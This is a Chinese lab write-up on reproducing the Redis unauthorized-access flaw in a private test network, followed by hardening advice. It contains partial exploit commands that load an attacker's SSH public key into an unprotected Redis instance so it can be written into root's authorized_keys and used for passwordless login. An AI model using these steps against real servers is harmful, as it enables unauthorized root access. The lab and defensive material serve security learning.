Redis未授权访问漏洞复现

Redis未授权访问漏洞介绍

Redis在默认情况下，会绑定在0.0.0.0:6379。如果没有采取相关的安全策略，例如添加防火墙规则、避免其他飞信人来源IP访问等，这样会使Redis 服务完全暴漏在公网上。如果在没有设置密码的情况下，会导致任意用户在访问目标服务器时，在未授权的情况下访问Redis以及读取数据。

攻击者在未授权的情况下可以利用Redis 自身提供的config、set命令来进行文件的读写和创建，这样一来攻击者就可以利用此命令将自己的ssh 公钥成功的写入到目标服务器中(目标服务器的/root/.ssh/文件夹下的authotrized_keys文件)，就可以使用对应的私钥直接使用ssh服务登录目标服务器。

漏洞产生原因

Redis默认情况下绑定在0.0.0.0:6379，且没有添加防火墙规则，直接暴漏在了公网上。 没有设置密码认证(一般为空)，可以免密远程密码登录

漏洞复现

环境搭建

攻击机：kali-linux 192.168.1.111

靶机： ubuntu 192.168.1.40

安装Redis服务

sudo  wget http://download.redis.io/releases/redis-3.2.11.tar.gz

使用如上命令进行下载redis源码压缩包

下载完成后，解压压缩包

tar -zxvf 文件名

解压完成后进入文件夹，输入make并执行即可

编译完成后，进入src目录，将redis-server和redis-cli拷贝到/usr/bin目录下(这样再启动redis-server和redis-cli就不用每次都进入安装目录了)

命令如下：

sudo cp redis-cli /usr/bin
sudo cp redis-server /usr/bin

返回redis目录，将redis.conf拷贝到/etc目录下，并编辑。

去掉IP绑定，允许本地外主机远程redis服务

关闭保护模式，允许远程连接redis服务

启动ssh服务。

利用漏洞攻击

靶机开启redis服务

在靶机中新开一个终端执行 sudo mkdir /root/.ssh,创建ssh公钥的存放目录

在kali攻击机中生成公钥和私钥，密码设置为空

将生成的公钥保存到ly0n.txt

(echo -e "\n\n";cat id_rsa.pub; echo -e "\n\n") > ly0n.txt

将ly0n.txt写入到redis

cat ly0n.txt | redis-cli -h 192.168.1.40 -x set crack

使用命令redis-cli -h 192.168.1.40远程登录redis服务

就可以利用服务自带的config和set来对文件进行操作。

上传文件

然后使用ssh免密登录靶机

很明显，登陆成功.

漏洞防护

禁止远程使用一些高危命令 可以修改redis.conf来禁用远程修改DB文件,例如 rename-command FLUSHALL “ “ rename-command CONFIG “ “ rename-command EVAL “ “ 低权限运行服务 为redis服务创建单独的/usr和home目录,并且配置禁止登录. groupadd -r redis && useradd -r -g redis redis 为Redis添加密码验证 通过修改redis.conf文件来添加 requirepass mypassword 禁止外网访问Redis 修改redis.conf文件配置使得redis服务只有本机能够使用